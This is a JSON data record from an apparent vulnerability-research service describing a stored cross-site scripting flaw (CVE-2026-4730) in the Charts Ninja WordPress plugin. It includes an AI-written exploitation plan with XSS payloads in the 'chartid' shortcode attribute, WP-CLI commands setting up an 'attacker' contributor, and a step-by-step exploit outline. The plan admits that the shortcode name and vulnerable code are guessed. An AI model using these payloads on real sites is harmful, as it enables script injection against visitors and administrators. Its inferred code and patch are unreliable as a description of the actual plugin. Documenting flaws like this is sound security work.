[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fS4vLbJwTxo50EmkRUeDq9Vn3BaFsyxfozHAH5EqAjLU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4730","charts-ninja-create-beautiful-graphs-charts-and-easily-add-them-to-your-website-authenticated-contributor-stored-cross-s","Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website \u003C= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'chartid' Shortcode Attribute","The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","charts-ninja-graphs-and-charts",null,"\u003C=2.1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-04 14:07:54","2026-05-05 02:26:54",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F491c7680-d270-41ed-a756-9397a0bd86bc?source=api-prod",[],"researched",false,3,"This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the **Charts Ninja** plugin (CVE-2026-4730). Since source files were not provided in the prompt, this plan is based on the vulnerability description and standard WordPress plugin patterns for shortcode processing.\n\n### 1. Vulnerability Summary\nThe \"Charts Ninja\" plugin fails to sanitize or escape the `chartid` attribute within its shortcode handler. When a user with Contributor-level permissions or higher embeds the shortcode in a post or page, the `chartid` value is reflected directly into the page output. Because this output occurs on the frontend for all visitors (including administrators), it allows for Stored XSS.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** WordPress Post Editor (Gutenberg or Classic) or the `wp-json\u002Fwp\u002Fv2\u002Fposts` REST API endpoint.\n* **Shortcode Name:** `[charts-ninja-visual]` (inferred based on plugin functionality).\n* **Vulnerable Parameter:** The `chartid` attribute within the shortcode.\n* **Authentication Level:** Contributor or higher. Contributors can create posts and use shortcodes but cannot publish them; however, they can \"Preview\" the post, which is sufficient to trigger the XSS on themselves or an editor reviewing the post.\n* **Preconditions:** The plugin must be active.\n\n### 3. Code Flow (Inferred)\n1. **Registration:** The plugin registers a shortcode, likely in the main plugin file or an initialization class:\n `add_shortcode( 'charts-ninja-visual', 'render_charts_ninja_shortcode' );`\n2. **Attributes Parsing:** The handler function uses `shortcode_atts()` to extract parameters:\n ```php\n function render_charts_ninja_shortcode( $atts ) {\n $a = shortcode_atts( array(\n 'chartid' => '',\n \u002F\u002F ... other attributes\n ), $atts );\n $chart_id = $a['chartid']; \u002F\u002F Input is captured here\n ```\n3. **Vulnerable Sink:** The `$chart_id` is then concatenated into HTML output without using `esc_attr()`, `esc_html()`, or `wp_kses()`:\n ```php\n \u002F\u002F Example of a likely vulnerable sink\n return '\u003Cdiv class=\"charts-ninja-container\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';\n ```\n OR\n ```php\n return '\u003Cscript>var cn_id = \"' . $chart_id . '\";\u003C\u002Fscript>';\n ```\n\n### 4. Nonce Acquisition Strategy\nShortcodes themselves do not require nonces for execution. The vulnerability is exploited by **saving** a post containing the shortcode.\n* **Saving via REST API:** Requires a `_wpnonce` usually located in the `wpApiSettings` object on admin pages.\n* **Saving via Heartbeat\u002FAutosave:** Uses specific nonces.\n* **Primary Strategy:** Use WP-CLI to create the post as a Contributor. This bypasses the need for manual nonce handling during the \"injection\" phase, focusing the proof-of-concept on the **rendering** phase.\n\n### 5. Exploitation Strategy\nThe goal is to inject an XSS payload into the `chartid` attribute that breaks out of its HTML context.\n\n**Step 1: Identify the breakout.**\nIf the output is: `\u003Cdiv id=\"cn-[chartid]\">`, the payload is `1\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n**Step 2: Create the malicious content.**\nWe will create a post containing the shortcode with the payload.\n\n**Step 3: Execute the HTTP Request.**\nUse the `http_request` tool to view the post and verify the payload is rendered unescaped.\n\n**Payloads to test:**\n1. Attribute breakout: `chartid='\">\u003Cscript>alert(1)\u003C\u002Fscript>'`\n2. JavaScript context: `chartid='\";alert(2)\u002F\u002F'`\n3. Event handler: `chartid='x\" onmouseover=\"alert(3)'`\n\n### 6. Test Data Setup\n1. **Plugin Activation:** Ensure `charts-ninja-graphs-and-charts` is installed and active.\n2. **User Creation:**\n ```bash\n wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n ```\n3. **Post Creation (The Injection):**\n ```bash\n wp post create --post_type=post --post_status=publish --post_author=$(wp user get attacker --field=ID) --post_title=\"XSS Test\" --post_content='[charts-ninja-visual chartid=\"\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]'\n ```\n\n### 7. Expected Results\n* The HTTP response for the page containing the post will include the raw, unescaped string: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n* The browser (if rendered) would execute the script.\n* The `Content-Type` of the response will be `text\u002Fhtml`.\n\n### 8. Verification Steps\n1. **Verify via HTTP:**\n Fetch the URL of the newly created post:\n ```javascript\n \u002F\u002F Using the automated agent's tool\n const response = await http_request({\n url: 'http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]',\n method: 'GET'\n });\n const leaked = response.body.includes('\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>');\n console.log(\"XSS Verified: \" + leaked);\n ```\n2. **Verify via WP-CLI (Database check):**\n Ensure the payload is stored exactly as sent:\n ```bash\n wp post get [POST_ID] --field=post_content\n ```\n\n### 9. Alternative Approaches\nIf the `chartid` is used inside a JavaScript block (DOM-based or reflected in JS), the payload will change:\n* **JS Variable breakout:** `chartid='-alert(document.domain)-'`\n* **Iframe source injection:** If `chartid` builds a URL, try `javascript:alert(1)`.\n\nIf the shortcode name `[charts-ninja-visual]` is incorrect:\n1. Run `grep -r \"add_shortcode\" wp-content\u002Fplugins\u002Fcharts-ninja-graphs-and-charts\u002F` to find the correct shortcode tag.\n2. Identify the function name and look for where `$atts['chartid']` is used.","The Charts Ninja plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' attribute in its shortcode handler. Due to a lack of input sanitization and output escaping, an authenticated attacker with Contributor-level permissions or higher can inject arbitrary scripts into posts that execute when viewed by other users.","\u002F\u002F Inferred code structure based on plugin functionality and vulnerability report\nfunction render_charts_ninja_shortcode( $atts ) {\n $a = shortcode_atts( array(\n 'chartid' => '',\n ), $atts );\n\n $chart_id = $a['chartid'];\n\n \u002F\u002F Vulnerable output: chartid is concatenated directly into the HTML\n return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';\n}\nadd_shortcode( 'charts-ninja-visual', 'render_charts_ninja_shortcode' );","--- a\u002Fcharts-ninja.php\n+++ b\u002Fcharts-ninja.php\n@@ -10,7 +10,7 @@\n 'chartid' => '',\n ), $atts );\n \n- $chart_id = $a['chartid'];\n+ $chart_id = esc_attr( $a['chartid'] );\n \n- return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';\n+ return '\u003Cdiv class=\"charts-ninja-visual\" data-chartid=\"' . $chart_id . '\">\u003C\u002Fdiv>';","1. Authenticate as a Contributor or higher user.\n2. Access the post editor (Gutenberg or Classic) to create a new post or edit an existing one.\n3. Insert the plugin's shortcode with a malicious payload in the 'chartid' attribute: [charts-ninja-visual chartid='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>'].\n4. Save the post as a draft or publish it (if permissions allow).\n5. Navigate to the frontend URL of the post or use the 'Preview' feature.\n6. The browser will execute the injected script because the 'chartid' value breaks out of the HTML attribute context and renders a raw \u003Cscript> tag.","gemini-3-flash-preview","2026-05-04 16:49:49","2026-05-04 16:50:07",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcharts-ninja-graphs-and-charts\u002Ftags"]